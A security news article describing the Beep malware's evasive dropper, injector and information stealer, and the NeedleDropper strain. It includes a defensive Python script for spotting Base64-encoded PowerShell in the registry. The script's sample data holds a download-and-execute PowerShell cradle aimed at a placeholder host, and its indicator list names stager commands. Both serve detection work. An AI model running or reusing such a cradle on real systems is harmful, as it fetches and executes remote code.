Experts Warn of ‘Beep’ – A New Evasive Malware That Can Fly Under the Radar

February 15, 2023 | Ravie Lakshmanan | Threat Detection / Malware


Cybersecurity researchers have discovered a new piece of evasive malware called Beep. It is designed to fly under the radar and drop additional payloads on compromised hosts.

“The authors of this malware appeared to be trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find,” said Minerva Labs researcher Natalie Zargarov.

“One such technique involved using the Beep API function to slow down execution, hence the name of the malware.”

Beep consists of three components. The first component is a dropper that creates a new Windows Registry key and executes the Base64-encoded PowerShell script stored there.

The PowerShell script contacts a remote server to retrieve the injector. After checking that it is not being debugged or run inside a virtual machine, the injector extracts the payload and launches it using a technique called process hollowing.

The payload is an information stealer capable of collecting and exfiltrating system information and enumerating running processes. Other instructions the malware can receive from its command-and-control (C2) server include commands to execute DLL and EXE files.
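The dropper described above parks a Base64-encoded PowerShell script in the registry. The following Python check, added here as an illustration and not code from Minerva Labs or from Beep itself, walks a set of registry string values, decodes any that are valid Base64 (covering both plain text and the UTF-16LE form that `powershell -EncodedCommand` expects) and flags those containing PowerShell stager tokens. The key paths, sample values and indicator list are constructed assumptions to be tuned for your environment.

```python
import base64
import binascii
import re

# Tokens commonly seen in PowerShell stagers; an assumed starting list, tune it for your environment.
PS_INDICATORS = re.compile(
    r"(?i)(Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|New-Object\s+Net\.WebClient|"
    r"Invoke-WebRequest|FromBase64String|-EncodedCommand|Start-Process)"
)

def decode_candidate(value: str):
    """Return the text behind a Base64 registry string, or None if it is not Base64-wrapped text."""
    stripped = re.sub(r"\s+", "", value)
    if len(stripped) < 32 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", stripped):
        return None
    try:
        raw = base64.b64decode(stripped, validate=True)
    except (binascii.Error, ValueError):
        return None
    # powershell -EncodedCommand takes UTF-16LE; ASCII text in that form has a zero high byte.
    enc = "utf-16-le" if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4 else "utf-8"
    try:
        return raw.decode(enc)
    except UnicodeDecodeError:
        return None

def scan_registry_values(values):
    """values: iterable of (key_path, value_name, data). Returns one finding per suspicious value."""
    findings = []
    for key_path, name, data in values:
        decoded = decode_candidate(data) if isinstance(data, str) else None
        if decoded is None:
            continue
        hits = sorted({m.group(0) for m in PS_INDICATORS.finditer(decoded)})
        if hits:
            findings.append({"key": key_path, "value": name, "indicators": hits,
                             "decoded_preview": decoded[:80]})
    return findings

# Constructed sample registry values (placeholder key paths, not Beep's real locations).
SAMPLE_VALUES = [
    ("HKCU\\Software\\ExampleA", "Config", base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16-le")).decode()),
    ("HKCU\\Software\\ExampleB", "Path", "C:\\Program Files\\Vendor\\app.exe"),
    ("HKCU\\Software\\ExampleC", "Loader", base64.b64encode(
        b"Invoke-Expression ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($env:X)))").decode()),
    ("HKLM\\Software\\ExampleD", "Token", base64.b64encode(b"just some opaque binary blob \x00\x01\x02").decode()),
]
```

Calling `scan_registry_values(SAMPLE_VALUES)` flags the Config and Loader values and ignores the plain path and the opaque blob.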


Many other features have yet to be implemented, suggesting that Beep is still in early development.

What sets the new malware apart is its focus on stealth: it employs numerous evasion tactics to thwart analysis, evade sandboxes, and slow execution.

“This malware is very dangerous because once it successfully enters a system, it can easily download and spread various additional malicious tools, including ransomware,” said Zargarov.

The findings come after antivirus vendor Avast revealed details of another dropper strain, codenamed NeedleDropper, that has been used to distribute various malware families since October 2022.

Delivered via spam email attachments, Discord, or OneDrive URLs, the malware is suspected to be offered as a service for other criminals looking to distribute their own payloads.

“This malware attempts to hide itself by dropping many unused and invalid files and storing important data among several megabytes of unimportant data,” said the company.
